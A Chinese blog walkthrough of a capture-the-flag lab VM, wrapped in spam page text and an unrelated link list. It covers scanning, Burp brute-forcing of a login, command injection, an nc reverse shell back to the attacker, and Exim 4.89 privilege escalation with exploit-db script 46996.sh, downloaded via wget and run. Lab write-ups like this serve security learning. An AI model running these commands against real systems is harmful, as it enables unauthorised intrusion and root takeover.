当前位置: 首页 > news >正文

做网站出路中学网站建设 课设

做网站出路,中学网站建设 课设,麦田 网站建设,桂林楼盘网信息搜集: 首先获取靶场ip,和之前一样。 arp-scan -l nmap -sP 192.168.28.0/24然后访问。 发现需要登录。 漏洞分析: 直接用bp爆破,爆破出来密码为happy,登录。 发现执行了命令,抓包。 修改命令可以执行&#xff…

信息搜集:

首先获取靶场ip,和之前一样。

arp-scan -l
nmap -sP 192.168.28.0/24

image-20230228170123671

然后访问。

发现需要登录。

漏洞分析:

image-20230228170152122

直接用bp爆破,爆破出来密码为happy,登录。

image-20230303155654501

发现执行了命令,抓包。

image-20230303155744771

修改命令可以执行,反弹一下shell试试。

反弹shell:

本地打开监听

nc -lvvp 9999

目标机主动连接

 nc <攻击机IP> <攻击机监听的端口> -e /bin/bash

image-20230303160123128

然后进入交互模式。

python -c "import pty;pty.spawn('/bin/bash')"

image-20230303160300869

然后用find命令找flag。

find / -name *flag*

没有找到,可能是权限不够,suid提权。

提权:

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

发现有/usr/sbin/exim4,看一下版本。

/usr/sbin/exim4 --version

image-20230303161520136

Exim version 4.89。

去搜一下paylaod。

searchsploit exim 4

image-20230303162031427

使用这个,本地起一个apache服务,然后将sh文件传入html页面。

systemctl start apache2.service
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html

然后在目标机器上下载payload。

wget http://192.168.28.128/46996.sh

直接下载会发现没有权限,所以说随便进入一个 有权限的目录里下载。

下载后给可执行权限。

chmod +x 46996.sh
./46996.sh

image-20230303162820123

得到flag:

然后在root里得到flag。

image-20230303163824600

http://www.yayakq.cn/news/724406/

相关文章:

  • 网站开发运营公司绩效提成方案网站被百度删除的原因
  • 中国响应式网站宣传 网站建设和政务公开
  • 阿里云做的网站为啥没有ftp小木桥建设网站
  • 做淘宝代理哪个网站好免费云主机服务器
  • phpcms网站模版国外媒体中文网站
  • 移动网站转码织梦网网站建设
  • 电子网站建设同样也是做严选的网站
  • 天河外贸网站建设wordpress logo位置
  • 房产中介 网站模板在线做图网站
  • 深圳哪个做网站好优化网页设计心得300
  • 慈溪建设集团网站如何建设网站首页
  • 设计签名免费网站百度搜不到网站
  • 石家庄市网站建设培训班企业网站建设原则
  • 建设网站时怎么做网页快
  • 用淘宝做公司网站网页设计与网站开发试题
  • 合肥网站建设方案书wordpress迁移所有页面空白
  • 做网站建设一条龙全包购物网站seo
  • 做网站都需要做什么婚庆网站建设目的
  • 密云石家庄网站建设做奢侈品的网站
  • 武进网站建设效果网页版哔哩哔哩怎么下载视频
  • 成都网站建设著名公司wordpress纯代码点赞
  • 优秀的设计网站有哪些网页设计与制作课本
  • 怎么用安卓机顶盒做网站服务器模板网站的缺点
  • 网站建站模板网页制作网站源码
  • 西宁网站搭建企业网站后台登陆验证码
  • 大数据网站建设费用网站注册费用需要多钱
  • 网站开发毕设论文做淘宝客网站好搭建吗?
  • ps制作网站首页界面建筑网片是干什么用的
  • 网站参数修改做网站是不是涉及很多语言职
  • iosapp做网站wordpress 关键词描述